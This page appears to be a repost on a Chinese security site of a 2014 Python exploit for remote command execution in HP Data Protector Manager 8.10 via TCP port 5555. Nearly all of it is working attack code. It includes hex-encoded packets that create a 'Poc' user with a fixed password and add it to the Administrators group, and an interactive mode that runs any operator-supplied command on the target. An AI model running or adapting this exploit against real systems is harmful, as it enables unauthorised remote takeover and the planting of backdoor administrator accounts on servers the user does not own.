HP Data protector manager 8.10 remote command execution

首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

HP Data protector manager 8.10 remote command execution

来源：https://intrusionlabs.org 作者：Polunchis 发布时间：2014-07-15

#!/usr/bin/python 
   
# Exploit Title: HP-Data-Protector-8.10 Remote command execution. 
# Date: July 11 2014 
# Exploit Author: Christian (Polunchis) Ramirez https://intrusionlabs.org 
# Exploit Author: Henoch (Chanoc) Barrera       https://intrusionlabs.org 
# Contacts: polunchis@intrusionlabs.org and chanoc@intrusionlabs.org 
# Version: HP Data Protector manager 8.10 the last version 
# Vendor web page: http://www8.hp.com/mx/es/software-solutions/software.html?compURI=1175640#.U8DhWaU_BjF 
# Tested on: Windows 2003, Windows 2008 and Windows 2012 all languages  
# Thanks:To GOD for giving us wisdom       
# Description:  
# A remote command execution is triggered when craft command is sent to the Hp Data Protector Manager to tcp port 5555. 
  
import socket 
import struct 
import sys 
  
#net user Poc l@bs.og /add 
shellusr = ("\x00\x00\x01\x3c\xff\xfe\x32\x00\x00\x00\x20\x00\x68\x00\x70\x00"
"\x64\x00\x70\x00\x31\x00\x00\x00\x20\x00\x30\x00\x00\x00\x20\x00"
"\x00\x00\x20\x00\x00\x00\x20\x00\x45\x00\x4e\x00\x55\x00\x00\x00"
"\x20\x00\x31\x00\x31\x00\x00\x00\x20\x00\x45\x00\x58\x00\x45\x00"
"\x43\x00\x5f\x00\x42\x00\x41\x00\x52\x00\x00\x00\x20\x00\x41\x00"
"\x41\x00\x41\x00\x41\x00\x00\x00\x20\x00\x41\x00\x41\x00\x41\x00"
"\x41\x00\x00\x00\x20\x00\x41\x00\x41\x00\x41\x00\x41\x00\x00\x00"
"\x20\x00\x41\x00\x41\x00\x41\x00\x41\x00\x00\x00\x20\x00\x41\x00"
"\x41\x00\x41\x00\x41\x00\x00\x00\x20\x00\x41\x00\x41\x00\x41\x00"
"\x41\x00\x00\x00\x20\x00\x41\x00\x41\x00\x41\x00\x41\x00\x00\x00"
"\x20\x00\x41\x00\x41\x00\x41\x00\x41\x00\x00\x00\x20\x00\x41\x00"
"\x41\x00\x41\x00\x41\x00\x00\x00\x20\x00\x41\x00\x41\x00\x41\x00"
"\x41\x00\x00\x00\x20\x00\x63\x00\x3a\x00\x5c\x00\x77\x00\x69\x00"
"\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x5c\x00\x73\x00\x79\x00"
"\x73\x00\x74\x00\x65\x00\x6d\x00\x33\x00\x32\x00\x5c\x00\x63\x00"
"\x6d\x00\x64\x00\x2e\x00\x65\x00\x78\x00\x65\x00\x00\x00\x20\x00"
"\x00\x00\x20\x00\x2f\x00\x63\x00\x20\x00\x6e\x00\x65\x00\x74\x00"
"\x20\x00\x75\x00\x73\x00\x65\x00\x72\x00\x20\x00\x50\x00\x6f\x00"
"\x63\x00\x20\x00\x6c\x00\x40\x00\x62\x00\x73\x00\x2e\x00\x6f\x00"
"\x67\x00\x20\x00\x2f\x00\x61\x00\x64\x00\x64\x00\x00\x00\x00\x00") 
  
#net user local group Administrators Poc /add 
shellgrp = ("\x00\x00\x01\x56\xff\xfe\x32\x00\x00\x00\x20\x00\x68\x00\x70\x00"
"\x64\x00\x70\x00\x31\x00\x00\x00\x20\x00\x30\x00\x00\x00\x20\x00"
"\x00\x00\x20\x00\x00\x00\x20\x00\x45\x00\x4e\x00\x55\x00\x00\x00"
"\x20\x00\x31\x00\x31\x00\x00\x00\x20\x00\x45\x00\x58\x00\x45\x00"
"\x43\x00\x5f\x00\x42\x00\x41\x00\x52\x00\x00\x00\x20\x00\x41\x00"
"\x41\x00\x41\x00\x41\x00\x00\x00\x20\x00\x41\x00\x41\x00\x41\x00"
"\x41\x00\x00\x00\x20\x00\x41\x00\x41\x00\x41\x00\x41\x00\x00\x00"
"\x20\x00\x41\x00\x41\x00\x41\x00\x41\x00\x00\x00\x20\x00\x41\x00"
"\x41\x00\x41\x00\x41\x00\x00\x00\x20\x00\x41\x00\x41\x00\x41\x00"
"\x41\x00\x00\x00\x20\x00\x41\x00\x41\x00\x41\x00\x41\x00\x00\x00"
"\x20\x00\x41\x00\x41\x00\x41\x00\x41\x00\x00\x00\x20\x00\x41\x00"
"\x41\x00\x41\x00\x41\x00\x00\x00\x20\x00\x41\x00\x41\x00\x41\x00"
"\x41\x00\x00\x00\x20\x00\x63\x00\x3a\x00\x5c\x00\x77\x00\x69\x00"
"\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x5c\x00\x73\x00\x79\x00"
"\x73\x00\x74\x00\x65\x00\x6d\x00\x33\x00\x32\x00\x5c\x00\x63\x00"
"\x6d\x00\x64\x00\x2e\x00\x65\x00\x78\x00\x65\x00\x00\x00\x20\x00"
"\x00\x00\x20\x00\x2f\x00\x63\x00\x20\x00\x6e\x00\x65\x00\x74\x00"
"\x20\x00\x6c\x00\x6f\x00\x63\x00\x61\x00\x6c\x00\x67\x00\x72\x00"
"\x6f\x00\x75\x00\x70\x00\x20\x00\x41\x00\x64\x00\x6d\x00\x69\x00"
"\x6e\x00\x69\x00\x73\x00\x74\x00\x72\x00\x61\x00\x74\x00\x6f\x00"
"\x72\x00\x73\x00\x20\x00\x50\x00\x6f\x00\x63\x00\x20\x00\x2f\x00"
"\x61\x00\x64\x00\x64\x00\x00\x00\x00\x00") 
  
def connect_target(target, port): 
    try: 
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 
    except socket.error as err: 
        print
        "[-]Close Socket! CODE: %d MSG: %s" % (err[0], err[1]) 
        return -1
  
    try: 
        sock.connect((target, port)) 
    except socket.error as err: 
        print
        "[-] It cannot connect to the target! CODE: %d MSG: %s" % (err[0], err[1]) 
        return -1
    return sock 
  
def send_recv_packet(sock, packet): 
    sock.sendall(packet) 
    res = sock.recv(4096) 
    return res 
print """ 
[*] https://intrusionlabs.org  
"""
print "[*] Choose a valid option"
print """ 
[1] Run remote commands  
[2] Add Poc user to Administrators group with password l@bs.og 
"""
opcion= raw_input("Choose an option i.e.  1 or 2:  ") 
if opcion.isdigit(): 
      opcion = int(opcion) 
  
if opcion == 1: 
 ip_remota= raw_input("IP Address: ") 
 port= raw_input("Port: ") 
 command= raw_input("command: ") 
 if port.isdigit(): 
   port = int(port) 
 else: 
     print "Please provide a tcp port"
  
 objetivo = connect_target(ip_remota, port) 
 if objetivo == -1: exit() 
      
 OFFSET = 46
 command = command.replace("\\", "\\\\") 
 command_tmno = chr(OFFSET + len(command)) 
 shell = "\x00\x00\x00"   +\ 
     command_tmno         +\ 
     "\x32\x00\x01"       +\ 
     "\x01\x01\x01"       +\ 
     "\x01\x01\x00"       +\ 
     "\x01\x00\x01"       +\ 
     "\x00\x01\x00"       +\ 
     "\x01\x01\x00"       +\ 
     "\x2028\x00"         +\ 
     "\\\x70\x65\x72"     +\ 
     "\x6c\x2e\x65\x78"   +\ 
     "\x65\x00 \x2d\x65"  +\ 
     "\x73\x79\x73\x74\x65\x6d" +\ 
     "('%s')\x00" % command 
 print >> sys.stderr, "[+] Sending the payload with the command: '%s'" % command 
 datos = send_recv_packet(objetivo, shell)  # Parse the response back 
 print >> sys.stderr, "[+] Output:"
 while True: 
        # Get information about response 
        tmno_respuesta = objetivo.recv(4) 
        if not tmno_respuesta: break
        n = struct.unpack(">I", tmno_respuesta)[0] 
        respuesta = objetivo.recv(n) 
        respuesta = respuesta[5:].strip() 
        respuesta = respuesta.replace("\n", "") 
        respuesta = respuesta.replace("\x00", "") 
        if respuesta.upper().find("*RETVAL*") != -1: 
            break
        print respuesta 
     
 objetivo.close() 
 print >> sys.stderr, "print [!] Port close...\r"
  
elif opcion == 2: 
 ip_remota= raw_input("IP Address: ") 
 port= raw_input("\nPort: ") 
 if port.isdigit(): 
   port = int(port) 
 else: 
     print "Please provide a tcp port"
  
 print
 "\n [*]Creating P0c user and try to add it to Administrators group"
  
 #Get information about response 
 print "\n[*]Attempting to create Poc user and try to add it to Administrators group with password l@bs.og"
 for packet in [shellusr, shellgrp]: 
     target = connect_target(ip_remota, port) 
     if target == -1: exit() 
     data = send_recv_packet(target, packet) 
     print "[*]SERVER RESPONSE: " + \ 
     data.split("\xFF\xFE\x31\x00\x35\x00\x00\x00\x20\x00")[1].lstrip("\x07\x00\x01\x00").rstrip("$") 
     target.close() 
  
else: print "Please provide a valid option i.e. 1 or 2"

[

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

相关文章

·D-Link info.cgi POST Request B
·Elipse E3 Scada PLC Denial Of
·D-Link HNAP Request Remote Buf
·Oracle VirtualBox Guest Additi
·D-Link Unauthenticated UPnP M-
·Browserify 4.2.0 Remote Comman
·Dell Sonicwall Scrutinizer 11.
·Wordpress WPTouch Authenticate
·Flash "Rosetta" JSONP GET/POST
·Boat Browser 8.0 and 8.0.1 - R
·Yokogawa CS3000 BKFSim_vhfd.ex
·Node Browserify 4.2.0 - Remote

推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved